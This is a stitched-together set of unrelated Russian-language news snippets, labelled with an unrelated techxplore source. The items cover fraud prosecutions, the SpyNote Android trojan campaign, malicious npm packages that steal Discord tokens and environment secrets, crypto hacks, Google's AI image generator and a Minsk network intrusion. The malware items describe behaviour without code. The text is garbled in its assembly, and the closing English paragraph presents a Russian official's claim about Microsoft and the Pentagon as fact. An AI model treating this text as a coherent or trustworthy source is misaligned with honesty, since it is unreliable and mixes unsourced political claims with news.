• Source: https://techxplore.com/news/2021-09-side-channel-low-end.html
Чайковский городской суд Пермского края взыскал более 200 тысяч рублей с владельца счёта, на который мошенники переводили похищенные деньги для обналичивания, сообщили РАПСИ в пресс-службе прокуратуры Калмыкии.
Также с владельца счёта были взысканы проценты за пользование чужими денежными средствами в пользу пенсионерки, ставшей жертвой. Почему преступление не было доведено до конца в ведомстве не уточнили.
«Основанием для обращения прокурора в суд стали обстоятельства, связанные с хищением телефонными мошенниками денежных средств у пенсионерки путем обмана. Звонивший мужчина представился доверчивой женщине «сотрудником банка» и сообщил ложную информацию о прибыли, в результате мошеннических действий потерпевшей причинен значительный материальный ущерб на сумму свыше 200 тысяч рублей», — указали в ведомстве.
В полицию с заявлением обратился 31-летний мужчина, который рассказал, что нашел в мессенджере объявление о продаже пользовательского аккаунта компьютерной игры.
После этого он связался с продавцом в соцсети и договорился о сделке, а потом перевел ему 80 тысяч рублей.
Больше связаться с человеком по указанному номеру телефона ему не удалось, а доступ к игре он так и не получил.
Исследователи McAfee выявили масштабную кампанию по рассылке вредоносных SMS-
сообщений, нацеленную на владельцев смартфонов под управлением Android в
Японии.
Злоумышленники рассылали SMS от имени компаний, предоставляющих услуги электро- и водоснабжения, предупреждая адресатов о якобы имеющейся задолженности за пользование данными услугами. В сообщениях содержались ссылки, ведущие на фишинговые сайты, где жертвам предлагалось ввести личные данные и оплатить несуществующие долги. Там же на устройства японских пользователей загружался вредонос, замаскированный под официальное приложение местных поставщиков услуг.
Одним из таких поставщиков, чьё доброе имя было использовано злонамеренно, стала компания TEPCO, оказывающая услуги электроснабжения на территории Японии. Внезапная просьба установить вредоносное приложение на смартфон, по всей видимости, не вызывала подозрений у жертв, так как они хорошо знали эту компанию и доверяли ей.
Данная вредоносная операция проводилась подозрительно короткое время: с 7 по 9 июня 2023 года, однако успела затронуть тысячи пользователей по всей Японии.
Троян SpyNote, которым заражались устройства жертв, представляет собой уже известное шпионское ПО, позволяющее удалённо контролировать смартфон и получать доступ к личным данным владельца. Он крадёт контакты, SMS-переписку, журнал звонков, местоположение и другую конфиденциальную информацию.
Помимо осуществления шпионажа SpyNote также ворует данные для двухфакторной аутентификации из приложений Google Authenticator, Gmail и пароли от аккаунтов в социальных сетях. Злоумышленники из разных стран активно используют этот троян в своих вредоносных кампаниях на протяжении всего 2023 года, в частности для атак на финансовые организации.
После запуска SpyNote маскирует свои иконки под легитимные приложения, а затем открывает фейковый экран настроек и просит жертву включить доступ к специальным возможностям устройства. Это позволяет вредоносу отключить оптимизацию батареи и работать постоянно в фоновом режиме.
Также троян автоматически активирует установку приложений из неизвестных источников, что даёт ему возможность беспрепятственно загружать дополнительное вредоносное ПО. Такая тактика позволяет обойти бдительность жертвы и получить расширенные права на целевом устройстве.
Эксперты McAfee предупреждают, что пользователям Android следует проявлять повышенную осторожность и бдительность при получении подозрительных SMS, даже если кажется, что они поступили от поставщиков коммунальных услуг и прочих государственных организаций.
Внезапная загрузка APK-файлов с подозрительных сайтов также является хорошим индикатором того, что вас пытаются атаковать злоумышленники. Легитимное учреждение, если будет такая нужда, перенаправит вас в официальный магазин Google Play для установки приложения оттуда. И даже при скачивании из официальных источников нужно сначала почитать отзывы и проверить страницу издателя, потому что киберпреступники при большом желании могут подделать и её тоже.
Представлен набор патчей для GCC, позволяющий генерировать исполняемые файлы в формате APE (Actually Portable Executable), которые при связывании приложений со стандартной Си-библиотекой Cosmopolitan дают возможность создавать универсальные сборки приложений, запускаемые в разных операционных системах. Исполняемый файл в формате APE не привязан к отдельным платформам и может быть запущен в Linux, FreeBSD, macOS, OpenBSD, NetBSD и Windows.
Переносимость обеспечивается при помощи библиотеки Cosmopolitan, которая предоставляет универсальную обвязку над системными вызовами различных операционных систем. Формат APE основан на совмещении специфичных для разных операционных систем сегментов и заголовков (PE, ELF, MACHO, OPENBSD) в одном файле. В качестве примеров программ, которые могут быть собраны с библиотекой Cosmopolitan для одновременного выполнения в разных ОС, отмечены bash, curl, git, ninja, lua, cpython и gcc.
Патчи добавляют в GCC 11.2 новый флаг "-fportcosmo", упрощающий перевод программ, написанных на языке Си, на использование библиотеки Cosmopolitan. В частности, патчи автоматизируют решение проблем с выражениями switch и инициализацией структур, которые при сборке с Cosmopolitan в обычном GCC приводят к выводу ошибок и раньше требовали ручного изменения кода, так как макросы, подобные EINVAL, не являются константами в Cosmopolitan, а использование не констант в static struct, const struct и switch...case недопустимо. Код предложенных изменений опубликован под лицензией ISC (упрощённый вариант MIT/BSD).
Источник: opennet.ru
Специализирующая на безопасности DeFi компания Dedaub обнаружила уязвимость в протоколе Multichain, способную привести к краже активов на сумму $1 млрд.
Уязвимость была впервые обнаружена на прошлой неделе, когда хакеры с ее помощью вывели криптовалют на $2 млн. Dedaub [опубликовала](https://media.dedaub.com/phantom-functions-and-the-billion- dollar-no-op-c56f062ae49f) в своем блоге заявление о том, что под угрозой кражи были активы стоимостью в 500 раз больше. Причем, как оказалось, уязвимости было две. Одна из них находилась в пуле ликвидности WETH, а другая ― в смарт-контракте маршрутизатора. Это подсистема, распределяющая токены по сетям.
«Угроза была значительной. Ее можно назвать максимально возможной для одного протокола. В случае полноценного использования уязвимости под угрозой были активы на миллиард долларов. Это был бы один из самых масштабных взломов в истории», ― пишут представители Dedaub.
По словам специалистов по компьютерной безопасности, хакеры могли бы получить $431 млн в токенах WETH с помощью всего одной транзакции. Данные средства хранились всего на трех кошельках, включая адрес AnySwap Fantom Bridge, где имелось $367 млн. Также хакеры смогли бы вывести средства с 5 000 кошельков пользователей, которые не отозвали разрешения на взаимодействие со средствами. Еще $40 млн злоумышленники могли бы вывести с пулов ликвидности для других сетей, говорят в Dedaub.
Но главная лазейка для злоумышленников была в мосте AnySwap Fantom Bridge. Помимо кражи хранящихся на адресе $367 млн, хакеры могли бы бесконечно удваивать свои средства ― вкладывать токены в сети Эфириума, получать их в сети Fantom, а затем забирать токены из пула в сети Эфириума. При этом активы в сети Fantom оставались бы легитимными и ценными.
Кошельки, которые не отозвали разрешения для смарт-контрактов Multichain, остаются уязвимы для хакеров. Злоумышленники смогли вывести 1 150 ETH ($2.8 млн), но затем вернули 320 ETH ($780 000). Таким образом, потери составили более $2 млн. Ранее сообщалось, что хакеры вывели активов на $1.34 млн.
В репозитории NPM в[выявлено 17 вредоносных пакето](https://jfrog.com/blog/malicious-npm-packages-are-after-your-discord- tokens-17-new-packages-disclosed/), которые распространялись с использованием тайпсквоттинга, т.е. с назначением имён похожих на названия популярных библиотек с расчётом на то, что пользователь допустит опечатку при наборе имени или не заметит различий, выбирая модуль из списка.
Пакеты discord-selfbot-v14, discord-lofy, discordsystem и discord-vilao использовали модифицированный вариант легитимной библиотеки discord.js, предоставляющей функции для взаимодействия с API Discord. Вредоносные компоненты были интегрированы в один из файлов пакета и включали около 4000 строк кода, запутанного с использованием искажения имён переменных, шифрования строк и нарушения форматирования кода. Код сканировал локальную ФС на предмет токенов Discord и в случае выявления отправлял их на сервер злоумышленников.
Пакет fix-error был заявлен как исправляющий ошибки в Discord selfbot, но включал троянское приложение PirateStealer, осуществляющее кражу номеров кредитных карт и учётных записей, связанных с Discord. Вредоносный компонент активировался через подстановку JavaScript-кода в клиент Discord.
Пакет prerequests-xcode включал троян для организации удалённого доступа к системе пользователя, основанный на Python-приложении DiscordRAT.
Предполагается, что доступ к серверам Discord мог потребоваться злоумышленникам для развёртывания точек управления ботнетом, в качестве прокси для загрузки информации со взломанных систем, запутывания следов при совершении атак, распространения вредоносного ПО среди пользователей Discord или перепродажи премиальных аккаунтов.
Пакеты wafer-bind, wafer-autocomplete, wafer-beacon, wafer-caas, wafer-toggle, wafer-geolocation, wafer-image, wafer-form, wafer-lightbox, octavius-public и mrg-message-broker включали код для отправки содержимого переменных окружения, которые, например, могли включать ключи доступа, токены или пароли к системам непрерывной интеграции или облачным окружениям, таким как AWS.
Прокуратура отправила в суд дело о хищении 74 млн рублей у пайщиков КПК «Пенсионные сбережения». На скамье подсудимых — трое ульяновцев. Одного из них ждёт суровое наказание — он уже сидит по другому делу о «чёрном обнале» на сумму почти миллиард рублей. Подозреваемым доверяли пожилые люди. Кооператив работал по принципу финансовой пирамиды и в определенный момент объявил себя банкротом.
КПК «Пенсионные сбережения» в 2017 году организовали два товарища — Александр Юркаев и Руслан Карпенко. Кооператив оформили на подставных лиц, Карпенко стал председателем, потом его сестру Ольгу Кротову устроили в контору главным бухгалтером. Последние несколько лет она известна многим как бьюти-блогер в запрещённой социальной сети. Фигуранты открыли два офиса — в первом и втором переулках Мира. Набрали штат кассиров и консультантов, которые ничего не знали о «теневых» схемах.
Затем несвятая троица разорилась на широкую рекламу. В местных СМИ Кротова выступала спикером, обещала вкладчикам рост вложений. Самые выгодные условия предлагала пенсионерам — вклады под максимально разрешённый ЦБ процент. Это говорило о целевой аудитории кооператива. Ольга сообщала пайщикам, что сбережения застрахованы. «КПК должны работать в правовом поле, никаких сомнительных операций», — говорила она.
Как оказалось, «Пенсионные сбережения» работали по принципу финансовой пирамиды. По крайней мере, так считают ответственные за расследование уголовного дела лица. Фактически, кооператив никаких доходов не получал, а выплаты пайщикам происходили за счёт вложений новых участников.
Начали выводить деньги
Постепенно деньги стали «утекать» из кредитного кооператива. Юркаев, Карпенко и Кротова занимали аффилированным лицам — так звучит версия следствия. Первые 6,8 млн оформили на отца первого из перечисленных участников схемы. Получив деньги, мужчина пришёл в ульяновский филиал АО «ВЭБ-лизинг» и вышел оттуда с ключами от новенького грузового тягача «ДАФ» с полуприцепом «Когель».
Позже похожим образом Ольга Кротова и Руслан Карпенко вывели ещё 1,99 млн рублей. Они попросили некоего Игоря М. оформить займ в КПК, а после купить машину. В ульяновском салоне ООО «Мотом Премиум» он приобрёл чёрный «Мерседес», которым фактически не пользовался — передал транспорт троице.
Позже организаторы «теневой» схемы легализовали деньги через аффилированные фирмы — ООО «Динамика» (принадлежала родственнику Александра Юркаева) и ООО «Овощная грядка» (его отцу). Фактически взятые у КПК средства никто не возвращал.
Обанкротились и попали под прицел силовиков
Очень скоро выяснилось, что платить вкладчикам нечего. В середине 2020 года те массово пошли в суды. Потерянные обманутыми концессионерами суммы исчислялись сотнями тысяч. Один из пайщиков вложил в КПК 908 тысяч рублей под 13,97% годовых. К счастью, не потерял. Федеральный судья Ленинского района Татьяна Давыдова взыскала с «Пенсионных сбережений» в его пользу 1,02 млн рублей.
В Арбитражный суд поступил иск о банкротстве кооператива. Началась процедура наблюдения, которая завершилась через год — кооператив «Пенсионные сбережения» признали несостоятельным.
Одновременно в суд поступило уголовное дело банды «чёрных банкиров», которую возглавлял Александр Юркаев. С четырьмя подельниками он обналичил почти миллиард рублей, получал с каждой операции 4% (всего 32,5 млн рублей). Заработанные преступным путём деньги «отмывал» похожим способом — через покупку авто. Юркаева приговорили к 3,5 годам колонии общего режима. В октябре приговор устоял в апелляции. Мошенник сейчас находится в СИЗО и ждёт перевода в колонию.
Следствие считает, что Юркаев, Карпенко и Кротова похитили деньги у пайщиков КПК «Пенсионные сбережения» на общую сумму 74,4 млн рублей. Троице вменили четыре статьи УК РФ: ч. 2 ст. 187 (неправомерный оборот средств платежей орг. группой), п. «а» ч. 4 ст. 174.1 (легализация денег, полученных преступным путём, орг. группой), п. «а,б», ч. 4 ст. 174.1 (орг. группой и в особо крупном размере) и ч. 4 ст. 159 (мошенничество в особо крупном размере). По последней им грозит до десяти лет лишения свободы.
На днях уголовное дело передали в Ленинский районный суд. Дата первого слушания пока не назначена.
source:
sudact.ru/regular/doc/eUHu4ZDche1t/?regular-
txt=%EA%EF%EA+%EF%E5%ED%F1%E8%EE%ED%ED%FB%E5+%F1%E1%E5%F0%E5%E6%E5%ED%E8%FF®ular-
case_doc=®ular-lawchunkinfo=®ular-date_from=®ular-date_to=®ular-
workflow_stage=10®ular-area=®ular-court=®ular-
judge=&_=1701011777401&snippet_pos=
kad.arbitr.ru/Document/Pdf/48903d4e-b5fa-427d-bdaf-755d215c0bd9/7bbdc2ce-
af35-4e9a-b789-bd3339330dec/A72-1962-2020_20210702_Reshenija_i_postanovlenija.pdf?isAddStamp=True
73online.ru/r/obnal_na_800_millionov_v_ulyanovske_otdali_pod_sud_bandu_chernyh_bankirov-81308
Недавно представленная функция генератора изображений с использованием искусственного интеллекта в Google Поиске может изменить правила игры в создании контента с использованием искусственного интеллекта. Это дополнение, основанное на Google Imagen, инструменте, который все еще находится в стадии бета-тестирования, знаменует собой вторжение Google в постоянно расширяющуюся область визуальных эффектов, генерируемых искусственным интеллектом. До сих пор лишь немногие избранные имели доступ ко всем возможностям Google Imagen через AI Test Kitchen компании. Для широкой публики Google предлагал ограниченный доступ к конкретным инструментам на базе Imagen, таким как генераторы городов и монстров.
Благодаря интеграции этого генератора изображений с искусственным интеллектом более широкая аудитория теперь может ознакомиться с возможностями Google Imagen непосредственно в поисковой системе Google. Первоначально эта функция будет доступна только пользователям в США, которые подписались на Google Search Generative Experience (SGE), и будет работать исключительно на английском языке. Пользователи смогут легко создавать изображения из текстовых подсказок непосредственно в меню поиска, согласившись на это. Кроме того, генерация изображений AI станет опцией в результатах поиска изображений, что позволит пользователям создавать свои изображения, если желаемые результаты не найдены.
Пользователи могут указать тип изображения, которое они хотят, будь то фотография, рисунок или картина. Затем SGE предоставит четыре индивидуальных результата, позволяя пользователям выбрать предпочитаемое изображение и загрузить его в виде файла PNG. Эта функциональность напоминает использование Bing генерации изображений DALL-E, хотя Google обещает строгую фильтрацию контента для предотвращения создания потенциально оскорбительного контента.
Чтобы поддерживать стандарты сообщества и безопасность, Google принял ряд мер по предотвращению неправильного использования генератора изображений AI. Эти меры включают блокировку создания изображений с фотореалистичными лицами и ограничение подсказок, в которых упоминаются имена известных людей. Первоначально доступ будет ограничен пользователями старше 18 лет, а все сгенерированные изображения будут содержать водяные знаки и метаданные SynthID, что dent идентифицирует их как созданные ИИ.
Несмотря на заверения Google, остаются сомнения относительно эффективности этих мер защиты. Bing столкнулся с аналогичными проблемами: появились сообщения о том, что пользователи обходили защитные меры для создания нежелательного контента. Кроме того, случаи, когда люди обходят меры безопасности в отношении функций ИИ, как это видно на стикерах ИИ Meta для Facebook и WhatsApp, подчеркивают постоянную проблему неправомерного использования контента.
Google признает, что ее генератор изображений с использованием искусственного интеллекта не может быть безупречным, поэтому компания выбрала добровольный подход. Чтобы еще больше усовершенствовать инструмент и устранить потенциальные проблемы, Google включил механизм обратной связи, позволяющий пользователям сообщать о случаях, когда технология не оправдывает ожиданий. В отличие от генератора изображений AI от Bing, который предлагает ограниченный бесплатный доступ с платными опциями для дополнительной генерации изображений, компания не сообщила, планирует ли она взимать плату за эту функцию.
Помимо генератора изображений AI, Google представляет и другие примечательные функции в рамках Google Search Generative Experience (SGE). Одной из таких функций является диалоговый режим в Поиске, реализованный за счет интеграции с Bard, аналогичный интеграции Bing с Chat GPT. Пользователи также могут создавать персонализированный контент в SGE с возможностью регулировки длины и тона создаваемого вывода. Эти функции в настоящее время доступны пользователям , которые согласились использовать SGE через Google Search Labs в США.
Внедрение Google генератора изображений с использованием искусственного интеллекта в своей поисковой системе означает значительный шаг вперед в создании контента на основе искусственного интеллекта. Хотя эта технология имеет огромные перспективы, ее успех зависит от способности Google поддерживать строгую защиту контента и устранять потенциальные ловушки. Поскольку эта инновационная функция продолжает развиваться, она открывает новые возможности для пользователей, стремящихся расширить свои возможности создания визуального контента, хотя и с бдительностью, чтобы обеспечить ответственное использование.
Следственным управлением УСК по городу Минску завершено расследование многоэпизодного уголовного дела в отношении четырех жителей столицы. Об этом БЕЛТА сообщила официальный представитель УСК по городу Минску Екатерина Гарлинская.
"По данным следствия, в ночное время в октябре и ноябре прошлого года 35-летний мужчина, находясь на техническом этаже здания на улице Притыцкого в Минске, с помощью компьютерной техники путем нарушения системы защиты и использования вредоносного программного обеспечения осуществил несанкционированный доступ к информации, хранящейся в компьютерной сети Мингорисполкома. В результате фигурант завладел записями камер видеонаблюдения, установленных в столице, с целью последующей публикации на различных интернет-ресурсах, в том числе деструктивных и экстремистских Telegram-каналах", - рассказали в УСК.
Сотрудниками милиции 3 ноября мужчина задержан на месте совершения преступления. Установлены и задержаны еще трое фигурантов в возрасте от 32 до 35 лет, двое из которых оказались причастны ко взлому компьютерной сети Мингорисполкома. В ходе расследования уголовного дела достоверно установлено, что все мужчины систематически принимали участие в несанкционированных массовых мероприятиях, происходивших в Минске с августа по ноябрь 2020 года, сопряженных с блокированием дорог и неповиновением законным требованиям представителей власти. Зафиксировано 10 фактов их участия.
Следственным путем добыты доказательства о приготовлении обвиняемых к активному участию в массовых беспорядках и совершению погромов, поджогов, уничтожению имущества и вооруженному сопротивлению представителям власти. Однако фигуранты не смогли довести свой умысел до конца, поскольку были задержаны сотрудниками ГУБОПиК МВД. Во время обысков изъяты вещественные доказательства, в том числе зарегистрированное огнестрельное оружие "Тигр", "Сайга-МК", "ИЖ-54", патроны, бронежилет, каски, мечи, радиостанции с гарнитурой для скрытого ношения, листовки с призывами к забастовке и пиротехника.
Кроме этого, следствием установлены иные эпизоды противоправной деятельности двух обвиняемых. Как сообщалось ранее, УСК по городу Минску завершено расследование уголовного дела в отношении 32-летнего гражданина Украины, который с целью ведения радикальной деятельности создал в Telegram чат. Реализуя свой преступный умысел по порче имущества в общественных местах, действующие фигуранты вступили в указанный чат для совместного совершения противоправных действий. После мужчины приняли участие в нанесении на фасады зданий и иные объекты коммунальной собственности во Фрунзенском районе надписей и изображений протестного характера.
Трое фигурантов неоднократно привлекались к административной ответственности, все ранее не судимы и лишь один из них был официально трудоустроен.
По результатам расследования с учетом роли каждого фигуранта уголовного дела в совершенных преступлениях их действия были квалифицированы по ч.1 ст.342 (активное участие в групповых действиях, грубо нарушающих общественный порядок), ст.341 (порча имущества в общественных местах), ч.1 ст.13, ч.2 ст.293 (приготовление к участию в массовых беспорядках), ч.1 ст.350 (модификация компьютерной информации), ст.352 (неправомерное завладение компьютерной информацией), ч.1 ст.354 (использование вредоносных компьютерных программ) УК.
Уголовное дело о несанкционированном доступе к компьютерной информации, совершенном группой лиц по предварительному сговору из иной личной заинтересованности (ч.2 ст.349 УК) прекращено в связи с вступлением в силу закона, устраняющего наказуемость деяния.
В отношении всех обвиняемых применена мера пресечения в виде заключения под стражу.
Расследование завершено. Материалы переданы прокурору для направления в суд.
Как добавил БЕЛТА начальник УСК по городу Минску Сергей Паско, у одного из обвиняемых обнаружены две предсмертные записки, адресованные жене и малолетней дочери. Уверен, что указанный факт может свидетельствовать о том, что он, имея огнестрельное оружие, и с учетом призывов, размещаемых на экстремистских Telegram-каналах, был готов на самые радикальные действия, которые нами были предотвращены", - отметил он.
Работа следователей и сотрудников милиции по установлению лиц, причастных к организации массовых беспорядков, а также тех, кто активно в них принимал участие, не прекращается. "Только в период с августа по сентябрь этого года нам удалось установить и задержать 80 лиц. Большинство из них были уверены, что их личности не будут установлены, а действия останутся безнаказанными, - подчеркнул Сергей Паско. - Все виновные будут установлены и привлечены к ответственности. Одновременно напоминаем, что у тех, кто принимал участие в массовых беспорядках есть шанс добровольно явиться и признаться. Все будет учтено. Законом такая возможность предусмотрена".
Проект ФЗ 502104-8 "О
внесении изменений в КоАП (в части усиления ответственности за нарушение
порядка обработки персональных данных) ".
Планируют установить административную ответственность за действия
(бездействие) оператора, из-за которых произошла незаконная передача сведений
о физлицах. Среди прочего, планируется ужесточить наказания за непредставление
Роскомнадзору ряда уведомлений.
По проекту в случае незаконной передачи информации о людях в количестве от 1 тыс. до 10 тыс. человек грозит штраф:
На те же суммы предлагают штрафовать в случае утечки от 10 тыс. до 100 тыс.
идентификаторов***** , по которым можно определить физлиц.
За более масштабные происшествия хотят ввести более крупные штрафы.
Неправомерное распространение персональных данных спецкатегорий обернется
штрафом:
Сейчас таких составов в КоАП РФ нет. Однако, среди прочих, существует норма об ответственности за необеспечение сохранности данных при их неавтоматизированной обработке, если это повлекло, например, неправомерный или случайный доступ к ним.
За несообщение ведомству об утечке, которая нарушила права субъектов персональных данных, предлагают назначать такие штрафы:
За неуведомление о намерении обрабатывать личную информацию грозит штраф:
Те же, наказания установят для тех, кто известил Роскомнадзор несвоевременно.
Сейчас в этих ситуациях, предполагается, что могут применить общую статью КоАП
РФ о непредоставлении сведений. Она предусматривает намного более низкий
штраф, или вовсе предупреждение о недопустимости нарушения в будущем и
ответственности за нее.
***** Под идентификаторами, наиболее вероятно, понимается совокупность любых
данных, по которым граждан можно установить "конкретно", или как "конкретных",
а не только в формулировке 126 ФЗ, или об ЕСИА, сведений которые регулируются
положением о существовании "Единая система идентификации и аутентификации в
инфраструктуре, обеспечивающей информационно-технологическое взаимодействие
информационных систем, используемых для предоставления государственных и
муниципальных услуг в электронной форме " в соответствии с требованиями,
установленными абзацем шестым пункта 11 статьи 44 Закона № 126-ФЗ "О связи".
Я примерно могу представить как это будет работать. Но любопытно весьма и
весьма поглядеть на людей, которые в самом-то деле не хотят заполнять ничего
лишнего, иметь никаких избыточных биографических данных, потому что это
реальная угроза для существования их бизнеса.
Однако, помимо преславутого закручивания резьбы, это может быть откроет
удивительные возможности для креативного обхода такой угрозы для бизнеса (не
иных субъектов ответственности действия закона). Я бы не мыслил так уж
однобоко и однозначно.
Криптовалютный хакерский рынок в 2024 году продолжил демонстрировать значительный рост. По [данным](https://www.chainalysis.com/blog/crypto- hacking-stolen-funds-2025/) Chainalysis, в 2024 году сумма украденных средств достигла $2,2 миллиарда, что на 21,07% больше по сравнению с 2023 годом. Число атак также увеличилось — с 282 случаев в 2023 году до 303 в 2024 году
Первая половина года оказалась особенно активной. С января по июль было
похищено 1,58 миллиарда долларов, что на 84,4% больше, чем за аналогичный
период 2023 года. Однако во второй половине года темпы атак заметно снизились.
Эксперты связывают это с возможными геополитическими изменениями.
Рост объема украденной криптовалюты с 2015 по 2024 год (Chainalysis)
Среди целевых платформ выделяются изменения в предпочтениях злоумышленников. В 2024 году значительная часть атак была направлена на централизованные сервисы, такие как DMM Bitcoin ($305 млн) и WazirX ($234,9 млн), тогда как в предыдущие годы основное внимание уделялось децентрализованным DeFi- платформам. Это связано с уязвимостью DeFi, разработчики которых зачастую ставят скорость выхода продукта на рынок выше безопасности. Тем не менее, компрометация приватных ключей остаётся главным методом хакеров, обеспечивая доступ к активам пользователей.
Распределение краж по криптоплатформам (Chainalysis)
Приватные ключи стали причиной утраты 43,8% всех украденных средств в 2024
году. После их компрометации злоумышленники используют методы отмывания
средств через децентрализованные биржи, миксеры и мосты, чтобы затруднить их
отслеживание. Особенно выделяются атаки, связанные с Северной Кореей: хакеры
из КНДР в 2024 году похитили $1,34 млрд в 47 инцидентах, что составило 61% от
общего объёма краж за год. Это более чем вдвое превышает показатель 2023 года.
Объем краж криптовалюты со стороны Северной Кореи (Chainalysis)
Отмечается и усложнение методов атак КНДР. Северокорейские хакеры активно внедряются в криптовалютные компании, используя фальшивые личности и сложные схемы трудоустройства. Такой подход позволяет не только воровать средства, но и получать доступ к критически важной информации. В одном из недавних случаев Минюст США обвинил 14 северокорейцев, которые под видом удалённых IT- специалистов заработали $88 млн на краже данных и вымогательстве.
Влияние геополитики также сказывается на активности хакеров. После встречи лидеров России и Северной Кореи в июне 2024 года отмечено снижение объёмов похищенных средств на 53,73%. Возможно, это связано с перераспределением ресурсов или сменой приоритетов в деятельности Северной Кореи. Однако до конца года картина может измениться — хакеры часто активизируются в праздничные дни.
Крупнейшей атакой года стал взлом DMM Bitcoin. Хакеры нашли уязвимости в инфраструктуре платформы и похитили 4 502,9 BTC на сумму $305 млн. Несмотря на это, компания вернула деньги клиентам, но приняла решение закрыть биржу в декабре. Активы будут переданы другой компании — SBI VC Trade.
Растущий объём краж подчёркивает необходимость усиления мер безопасности. Для защиты криптоактивов важны совместные усилия компаний и государственных структур, развитие технологий и соблюдение строгих стандартов. Такие меры помогут не только защитить деньги пользователей, но и укрепить доверие к рынку в долгосрочной перспективе.
В ходе оперативных мероприятий сотрудники уголовного розыска УМВД России по ХМАО – Югре установили причастность 45-летнего жителя города Стерлитамак к совершению серии мошенничеств, в том числе на территории Югры. При содействии коллег из Росгвардии подозреваемый задержан по месту своего жительства в Башкирии.
Полицейские выяснили, что задержанный в 2018 году с помощью конструктора сайтов создал интернет-магазин оружия и аксессуаров к нему. На витрину торговой площадки он публиковал скаченные из всемирной сети фотографии различного оружия, а цена на несуществующие товары устанавливал ниже рыночной на 30%.
Сайт работал по принципу оставления заявки, номеров для обратной связи не было. Покупатель, выбрав необходимую позицию, должен был отправить администратору персональные данные и номер телефона. Через некоторое время подозреваемый созванивался с ним, представлялся менеджером магазина и убеждал внести предоплату, обещая отправить заказы транспортной компанией. После того, как потерпевший переводил деньги, аферист вытаскивал из телефона sim-карту, с которой совершался звонок, и больше ей не пользовался.
С 2018 года задержанному удалось создать 4 сайта и обмануть не менее 30 человек. Одним из потерпевших стал 22-летний житель Нефтеюганска, который в сентябре 2023 год попытался приобрести охолощенное оружие стоимостью 59 тысяч рублей, но покупку так и не дождался.
В настоящее время фигурант допрошен по уголовному делу о мошенничестве в качестве подозреваемого. По месту его жительства изъята компьютерная техника, sim-карты, телефоны и банковские карты различных кредитных организаций. Фальшивые интернет-магазины прекратили свою деятельность.
sc: мвд.рф/news/item/48875867
Как стало известно “Ъ”, в Замоскворецкий суд Москвы поступило дело бывшего председателя правления разорившегося Мастер-банка Бориса Булочника. Экс- руководителя кредитного учреждения, которое осталось должно вкладчикам более 62 млрд руб., обвиняют в особо крупном мошенничестве, а также отмывании денежных средств, в том числе путем приобретения за границей произведений искусства. Процесс будет проходить в заочном режиме, поскольку еще в 2016 году экс-банкир и меценат скрылся за границей и находится в международном розыске.
Уголовное дело, фигурантом которого является 74-летний Борис Булочник, столичная полиция расследовала более семи лет. Причем началось все с уголовного дела о преднамеренном банкротстве (ст. 196 УК РФ) Мастер-банка, расследование которого до сих пор не завершено. А возбуждено оно было после неоднократных обращений в правоохранительные органы представителей Агентства по страхованию вкладов. В ходе расследования было установлено, что «лица из числа бывших руководителей Мастер-банка с августа 2012-го по август 2013 года совершили действия по выдаче заведомо невозвратных кредитов, оформленных как на физических лиц, так и на различные юридические лица».
В общей сложности в деле набралось более 170 физлиц и 200 коммерческих организаций, на которые были оформлены подобные займы.
Click to expand...
Также выяснилось, что граждане в действительности договоры не заключали, а фирмы, задействованные в криминальной схеме, имели «признаки фиктивности». По данным МВД, противоправные действия финансистов вызвали сокращение активов Мастер-банка, который не смог удовлетворять требования кредиторов и вкладчиков, в связи с чем в ноябре 2013 года он сначала лишился лицензии, а 16 января 2014 года был признан банкротом. На тот момент нанесенный руководством банка ущерб оценивался в 17 млрд руб., а в итоге долг перед кредиторами составил более 62 млрд руб.
Россию Борис Булочник покинул практически сразу после краха Мастер-банка. Одно время вместе с семьей он проживал в Израиле, затем перебрался на свою родину — в Винницкую область Украины, но позже якобы вновь вернулся в Израиль.
В марте 2016 года господина Булочника объявили в международный розыск, а Тверской суд Москвы санкционировал его заочный арест. Еще через три месяца экс-банкиру заочно предъявили обвинение в особо крупном мошенничестве (ч. 4 ст. 159 УК РФ). Из фабулы обвинения следует, что Борис Булочник, «являясь председателем правления ОАО КБ "Мастер-банк", действуя вместе с соучастниками из числа руководителей и сотрудников банка, в период с июля 2011 года по ноябрь 2013 года похитил денежные средства кредитной организации». В частности, следствие считает доказанным факт предоставления группой предполагаемых мошенников заведомо невозвратных кредитов 70 физическим лицам, которые на самом деле денег не получали. Присутствуют в этом списке и четыре коммерческие структуры, «имеющие признаки фиктивности».
В общей сложности таким путем из банка было выведено почти 4,5 млрд руб.
Click to expand...
Кроме того, следствие вменяет в вину господину Булочнику и его сообщникам обман двух крупных вкладчиков Мастер-банка. В 2012 и 2013 годах топ-менеджмент этого кредитного учреждения убедил клиентов открыть в банке депозитный вклад на весьма выгодных условиях на сумму более 160 млн руб. Однако соответствующие документы о поступлении средств оформлены не были, а сами деньги впоследствии, по данным следствия, похищены.
А после того как следствие пришло к выводу, что Борис Булочник, приобретая за границей произведения искусства, которые он передавал в спонсируемый им Международный центр Рерихов (МЦР), таким образом отмывал деньги, похищенные у вкладчиков своего банка, ему вменили еще и п. п. «а», «б» ч. 4 ст. 174.1 УК РФ (легализация денежных средств, приобретенных лицом в результате совершения им преступления). В деле говорится, что соучастники преступления изготовили подложный кредитный договор, по условиям которого банк предоставил фиктивному заемщику кредит в сумме 275 млн руб. на срок до июля 2014 года.
При этом все деньги Мастер-банк перечислил иностранной компании в счет оплаты покупки 48 картин.
Click to expand...
Они также были ввезены в Россию, и, как говорится в деле, участники аферы «распорядились ими по своему усмотрению».
Отметим, что в 2017 году в МЦР во время обысков по делу Бориса Булочника в общей сложности было изъято и по решению суда арестовано около 200 полотен Николая и Святослава Рерихов. Впрочем, уже в этом году суд снял обременение с произведений искусства, поскольку они были переданы музею в период с 2002-го по начало 2010-х годов, то есть еще до инкриминируемой меценату Булочнику преступной деятельности. Тем не менее еще некоторая часть культурных ценностей, которая, по версии следствия, была приобретена на похищенные в Мастер-банке средства и передана господином Булочником в МЦР, по-прежнему остается под арестом. По некоторым данным, речь может идти как раз о тех самых 48 полотнах, приобретенных за счет фиктивного кредита.
source: kommersant.ru/doc/6351082
Microsoft wants to demonstrate its efforts to its US supporters in an effort to win a piece of the $15 billion funding set aside by the Pentagon. So,Microsoft is taking over Ukraine’s digital networks at Pentagon’s behest.
According to the deputy foreign minister of Russia, Oleg Syromolotov, Microsoft is executing a directive from the Pentagon and US special services to take away Ukraine’s “[ digital sovereignty](https://sputniknews.com/20220718/russian-deputy-fm-says- microsoft-is-taking-over-ukraines-digital-networks-at-pentagons- behest-1097433878.html)” by grabbing authority over its information space and digital infrastructure.
